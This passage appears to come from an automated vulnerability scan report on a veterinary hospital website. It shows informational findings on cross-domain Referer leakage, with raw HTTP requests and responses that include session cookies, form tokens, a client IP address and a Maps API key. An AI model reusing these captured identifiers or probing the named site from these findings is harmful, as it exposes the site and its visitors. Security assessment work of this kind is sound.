fname=&lname=&addr=&city=&state=FL&zip=&phone=&email=&optin=on&pettype&other=&petname=&petage=&variant=&submit=Get+FREE+Coupon&token=8d1014910f5e3f05f9cdcf25a9c679bb&guid=EB9CB843-C06F-419A-A604-9D3CF
...[SNIP]...

Response 2

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:17:33 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 3463
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<a href="?&state=FL&optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77">Offer Form</a></p></div></div><div class="nav-footer">
   <ul>
<li><a href="/main/directory.html" title="Other VCA Locations">Other VCA Locations</a></li><li>|</li>
<li><a href="/main/charities.html" title="VCA Charities">VCA Charities</li><li>|</li>

<li><a href="/main/about.php" title="About VCA">About VCA</a></li><li>|</li>
<li><a href="/main/contact.php" title="Contact Us">Contact Us</a></li><li>|</li>
<li><a href="/main/copyright.php" title="Copyright">Copyright</a></li><li>|</li>
<li><a href="/main/privacy-policy.php" title="Privacy Policy">Privacy Policy</a></li><li>|</li>
<li><a href="/main/sitemap.php" title="Site Map">Site Map</a></li> <li>|</li>
<li><a href="http://www.facebook.com/VCAAnimalHospitals" target="_blank">Like us on Facebook  <img src="/img/logo-facebook-like.png" style="vertical-align:bottom;" /></a></li>

</ul>
</div></div></div>
           <div class="pop-layer">
               <a href="javascript: void(0);" class="pop-close">close [x]</a>
               <div class="pop-content"></div>
           </div>
   </div>
       <script type="text/javascript">
           var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
           document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
       </script>
       <script type="text/javascript">
           try {
               var pageTracker = _gat._getTracker("UA-8482760-1");
               pageTracker._trackPageview();
           } catch(err) {}
       </script>
       <div class="pop-shim"></div>
       <div class="pop-modal">
           <a href="javascript: void(0);" class="pop-close">CLOSE</a>
           <div class="pop-content"></div>
       </div>
</body>

6.5. http://www.vcahospitals.com/marshfield/appt.html previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.vcahospitals.com
Path:	/marshfield/appt.html

Request 1

GET /marshfield/appt.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Referer: http://www.vcahospitals.com/marshfield
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.16.10.1299326665

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:45:38 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21614

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="token" id="token" value="726697e7d1d65ecce474a92fba41e028" />
           <input type="hidden" name="referer" id="referer" value="http://www.vcahospitals.com/marshfield" />
           <input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/marshfield/appt.html" />
           <input type="hidden" name="ipaddress" id="ipaddress" value="173.193.214.243" />
           <input type="hidden" name="useragent" id="useragent" value="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13" />
           <input type="hidden" name="guid" id="guid" value="" />
           <input type="hidden" name="source" id="source" value="marshfield" />
           <input type="hidden" name="appt_type" value="appt" />
       </form>
<p><span class="required"><strong>Important Notice:</strong></span><br />Do not use the appointment form in case of an emergency. Call us right away.</p><p>We will call you back to confirm your appointment within one business day during operating hours. Need to change your appointment? Just call us 24 hours before your scheduled time.</p><p>We respect your privacy and will not share your information with other parties. For more information, see the <a href="http://www.vcahospitals.com/marshfield/privacy-policy.html" title="VCA Privacy Policy">VCA Privacy Policy</a>.</p>        
       <script type="text/javascript">
if(typeof(_gat)!='object')document.write('<sc'+'ript src="http'+
(document.location.protocol=='https:'?'s://ssl':'://www')+
'.google-analytics.com/ga.js"></sc'+'ript>')</script>
<script type="text/javascript">
try {
var gwoTracker=_gat._getTracker("UA-8482760-2");
gwoTracker._trackPageview("/1639539707/test");
}catch(err){}</script>

                   </div>
                   <div class="nav-page">
<h3>3 simple steps to set <br />up an appointment <br />for your pet:</h3>
                       <div id="pictogram"><img src="http://ww
...[SNIP]...

Request 2

GET /marshfield/appt.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.16.10.1299326665

Response 2

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:46:15 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21576

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="token" id="token" value="0deb684bf4149527b041f1838c908e8d" />
           <input type="hidden" name="referer" id="referer" value="" />
           <input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/marshfield/appt.html" />
           <input type="hidden" name="ipaddress" id="ipaddress" value="173.193.214.243" />
           <input type="hidden" name="useragent" id="useragent" value="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13" />
           <input type="hidden" name="guid" id="guid" value="" />
           <input type="hidden" name="source" id="source" value="marshfield" />
           <input type="hidden" name="appt_type" value="appt" />
       </form>
<p><span class="required"><strong>Important Notice:</strong></span><br />Do not use the appointment form in case of an emergency. Call us right away.</p><p>We will call you back to confirm your appointment within one business day during operating hours. Need to change your appointment? Just call us 24 hours before your scheduled time.</p><p>We respect your privacy and will not share your information with other parties. For more information, see the <a href="http://www.vcahospitals.com/marshfield/privacy-policy.html" title="VCA Privacy Policy">VCA Privacy Policy</a>.</p>        
       <script type="text/javascript">
if(typeof(_gat)!='object')document.write('<sc'+'ript src="http'+
(document.location.protocol=='https:'?'s://ssl':'://www')+
'.google-analytics.com/ga.js"></sc'+'ript>')</script>
<script type="text/javascript">
try {
var gwoTracker=_gat._getTracker("UA-8482760-2");
gwoTracker._trackPageview("/1639539707/test");
}catch(err){}</script>

                   </div>
                   <div class="nav-page">
<h3>3 simple steps to set <br />up an appointment <br />for your pet:</h3>
                       <div id="pictogram"><img src="http://www.vcahospitals.com/marshfield/image/ho
...[SNIP]...

7. Cross-domain Referer leakage previous next
There are 6 instances of this issue:

/hanson/appt.html
/hanson/offer.html
/main/directory.html
/main/offer
/main/offer/thank-you.html
/new-york-veterinary-hospital/appt.html

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

7.1. http://www.vcahospitals.com/hanson/appt.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/hanson/appt.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.vcahospitals.com/hanson/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%26source%3dhanson%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3dc67ada53800ee9e18d7dea5bca8427db%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526source%253dhanson%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d151e7328bb1158b6923d3b2a31a6997c%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&source=hanson&submit=Request+An+Appointment&time1=&time2=&time3=&token=1bdd4ab27a6226797d1c64e72c38d205&uri=http:%2f%2fwww.vcahospitals.com%2fhanson%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526source%253dhanson%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d151e7328bb1158b6923d3b2a31a6997c%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26source%3dhanson%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d17a7a579651e8279d22ffcd2910aa757%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526source%253dhanson%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253dc67ada53800ee9e18d7d

The response contains the following links to other domains:

http://vca.unicaondemand.com/ods/js/imodTag.js
http://www.facebook.com/VCAAnimalHospitals

Request

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:51:48 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=v2putd7q3251oms7i32uuk9as6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 24905

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...
</script>
<script src="http://vca.unicaondemand.com/ods/js/imodTag.js" type="text/javascript"></script>
...[SNIP]...
<li><a href="http://www.facebook.com/VCAAnimalHospitals" target="_blank">Like us on Facebook  <img src="/img/logo-facebook-like.png" style="vertical-align:bottom;" />
...[SNIP]...

7.2. http://www.vcahospitals.com/hanson/offer.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/hanson/offer.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.vcahospitals.com/hanson/offer.html?addr=&captcha_code=&city=&email=&fname=&formtype=HOSPITAL&guid=007EF736-41A2-4D74-A734-EAAAE21050EB&ipaddress=173.193.214.243&js=&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3dD39719BC-A5D6-477B-8C66-B259FB8EE223%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d5ec6ecf4e1a8926f777dc6f65e4b5df0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&searchtype=&state=&submit=Submit&token=4aa32e878fa8952921f99572af385fde&uri=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3d6F138DDF-04F2-48B4-9D84-48AE7EDED93E%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d27ef4093596737f6510022b56c9c5db0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%253faddr%253d%2526captcha_code%253d%2526city%253d%2526email%253d%2526fname%253d%2526formtype%253dHOSPITAL%2526guid%253dD39719BC-A5D6-477B-8C66-B259FB8EE223%2526ipaddress%253d173.193.214.243%2526js%253d%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526searchtype%253d%2526state%253d%2526submit%253dSubmit%2526token%253d5ec6ecf4e1a8926f777dc6f65e4b5df0%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252foffer.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&zip=

The response contains the following links to other domains:

http://vca.unicaondemand.com/ods/js/imodTag.js
http://www.facebook.com/VCAAnimalHospitals

Request

GET /hanson/offer.html?addr=&captcha_code=&city=&email=&fname=&formtype=HOSPITAL&guid=007EF736-41A2-4D74-A734-EAAAE21050EB&ipaddress=173.193.214.243&js=&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3dD39719BC-A5D6-477B-8C66-B259FB8EE223%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d5ec6ecf4e1a8926f777dc6f65e4b5df0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&searchtype=&state=&submit=Submit&token=4aa32e878fa8952921f99572af385fde&uri=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3d6F138DDF-04F2-48B4-9D84-48AE7EDED93E%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d27ef4093596737f6510022b56c9c5db0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%253faddr%253d%2526captcha_code%253d%2526city%253d%2526email%253d%2526fname%253d%2526formtype%253dHOSPITAL%2526guid%253dD39719BC-A5D6-477B-8C66-B259FB8EE223%2526ipaddress%253d173.193.214.243%2526js%253d%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526searchtype%253d%2526state%253d%2526submit%253dSubmit%2526token%253d5ec6ecf4e1a8926f777dc6f65e4b5df0%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252foffer.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:51:40 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=j1fqeocn1q0uhv2hk1geg4cm22; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19335

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...
</script>
<script src="http://vca.unicaondemand.com/ods/js/imodTag.js" type="text/javascript"></script>
...[SNIP]...
<li><a href="http://www.facebook.com/VCAAnimalHospitals" target="_blank">Like us on Facebook  <img src="/img/logo-facebook-like.png" style="vertical-align:bottom;" />
...[SNIP]...

7.3. http://www.vcahospitals.com/main/directory.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/main/directory.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.vcahospitals.com/main/directory.html?utm_content=link.corp.ffe.locator.

The response contains the following links to other domains:

http://gmaps-utility-library.googlecode.com/svn/trunk/markermanager/release/src/markermanager.js
http://maps.google.com/maps?file=api&v=2&key=ABQIAAAA3yAtykvNwfZWXFMr5jaqbxQe81n6rsu4MMpbal4noyhM4BdC2xR3zat7Gh8uvXlxFvDMbMR1N9w9xw
http://vcajobs.com/
http://www.facebook.com/VCAAnimalHospitals
http://www.petinsurance.com/affiliates/vca.aspx?ec=VH0004
http://www.vcaantech.com/

Request

GET /main/directory.html?utm_content=link.corp.ffe.locator. HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.5.10.1299326665

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:44:12 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 87236

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
</script>
<script src="http://maps.google.com/maps?file=api&v=2&key=ABQIAAAA3yAtykvNwfZWXFMr5jaqbxQe81n6rsu4MMpbal4noyhM4BdC2xR3zat7Gh8uvXlxFvDMbMR1N9w9xw" type="text/javascript"></script>
<script src="http://gmaps-utility-library.googlecode.com/svn/trunk/markermanager/release/src/markermanager.js" type="text/javascript"></script>
...[SNIP]...
<li><a href="http://www.vcaantech.com/" title="VCA Antech Inc." target="_blank">VCA Antech Inc.</a>
...[SNIP]...
<li><a href="http://www.petinsurance.com/affiliates/vca.aspx?ec=VH0004" title="News" target="_blank">Pet Insurance</a>
...[SNIP]...
<li><a href="http://vcajobs.com" target="_blank" title="Careers">Careers</a>
...[SNIP]...
<li><a href="http://www.facebook.com/VCAAnimalHospitals" target="_blank">Like us on Facebook  <img src="/img/logo-facebook-like.png" style="vertical-align:bottom;" />
...[SNIP]...

7.4. http://www.vcahospitals.com/main/offer previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/main/offer

Issue detail

The page was loaded from a URL containing a query string:

http://www.vcahospitals.com/main/offer?r=E13&utm_source=google&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw

The response contains the following links to other domains:

http://gmaps-utility-library.googlecode.com/svn/trunk/markermanager/release/src/markermanager.js
http://maps.google.com/maps?file=api&v=2&key=ABQIAAAA3yAtykvNwfZWXFMr5jaqbxQe81n6rsu4MMpbal4noyhM4BdC2xR3zat7Gh8uvXlxFvDMbMR1N9w9xw

Request

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:03:36 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=3qhitggrmrfo3b1eptve2npsb6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 10741

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<div class="content">
<script src="http://maps.google.com/maps?file=api&v=2&key=ABQIAAAA3yAtykvNwfZWXFMr5jaqbxQe81n6rsu4MMpbal4noyhM4BdC2xR3zat7Gh8uvXlxFvDMbMR1N9w9xw" type="text/javascript"></script>
<script src="http://gmaps-utility-library.googlecode.com/svn/trunk/markermanager/release/src/markermanager.js" type="text/javascript"></script>
...[SNIP]...

7.5. http://www.vcahospitals.com/main/offer/thank-you.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/main/offer/thank-you.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.vcahospitals.com/main/offer/thank-you.html?

The response contains the following links to other domains:

http://ad.doubleclick.net/activity;src=1451979;type=freef218;cat=freef146;u5=3;u2=3;u3=http://www.vcahospitals.com/main/offer;u4=2505B0C6-B6AA-4144-878F-54873D353284;ord=1;num=1?
